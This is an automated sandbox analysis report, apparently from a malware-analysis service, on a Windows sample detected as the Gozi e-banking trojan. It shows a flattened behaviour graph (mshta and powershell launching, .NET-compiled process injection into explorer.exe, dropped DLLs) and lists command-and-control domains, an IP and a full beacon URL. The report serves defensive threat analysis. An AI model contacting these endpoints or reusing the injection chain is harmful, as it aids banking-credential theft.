  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 355490 Sample: SecuriteInfo.com.BScope.Tro... Startdate: 19/02/2021 Architecture: WINDOWS Score: 100 50 c56.lepini.at 2->50 52 resolver1.opendns.com 2->52 54 2 other IPs or domains 2->54 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 9 other signatures 2->76 9 loaddll32.exe 1 2->9         started        11 mshta.exe 19 2->11         started        14 iexplore.exe 2 66 2->14         started        signatures3 process4 signatures5 16 rundll32.exe 9->16         started        78 Suspicious powershell command line found 11->78 19 powershell.exe 2 30 11->19         started        22 iexplore.exe 31 14->22         started        25 iexplore.exe 30 14->25         started        27 iexplore.exe 30 14->27         started        process6 dnsIp7 58 Detected Gozi e-Banking trojan 16->58 60 Writes to foreign memory regions 16->60 62 Allocates memory in foreign processes 16->62 68 3 other signatures 16->68 29 control.exe 16->29         started        44 C:\Users\user\AppData\Local\...\vkjmiujf.0.cs, UTF-8 19->44 dropped 64 Compiles code for process injection (via .Net compiler) 19->64 66 Creates a thread in another existing process (thread injection) 19->66 31 csc.exe 19->31         started        34 csc.exe 19->34         started        36 conhost.exe 19->36         started        38 explorer.exe 19->38 injected 56 api10.laptok.at 34.65.15.6, 49734, 49735, 49736 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 22->56 file8 signatures9 process10 file11 46 C:\Users\user\AppData\Local\...\vy454zdn.dll, PE32 31->46 dropped 40 cvtres.exe 31->40         started        48 C:\Users\user\AppData\Local\...\vkjmiujf.dll, PE32 34->48 dropped 42 cvtres.exe 34->42         started        process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.65.15.6
 unknown United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG true

Contacted Domains

Name IP Active
c56.lepini.at 34.65.15.6 true
resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 34.65.15.6 true
api10.laptok.at 34.65.15.6 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api3.lepini.at/api1/HU2djjPvb8/3wTlevSrhaAhqj4Dd/_2FcnSXv37d6/lM3ay6ZyaF8/vzW2j5F6PCwbE2/5l1s0lalymuTZiQlrp1pk/siUYecp572aSkE1V/2s_2FqU5M39UKJJ/2AQbTY2p92Z6dpvNa0/A0KgQJiEZ/0_2FQT0WnjqaGoOUQLde/79w4eQg7V4tsTUU2owV/0VfGdBtsx_2BzPx5gEeSGQ/aortk5dEfSnNB/xndmgTyL/7wyLkKjs3enFFIe0bTY0HgG/EFiqNY6tyU/u33X0URZ7yfG_2Fqz/JtECL_2FwAWH/bZAwUzYcsqt/GeFhKrDcv1fANK/NTdyyO3l5t0m1tSTD/fAo false
  • Avira URL Cloud: safe
 unknown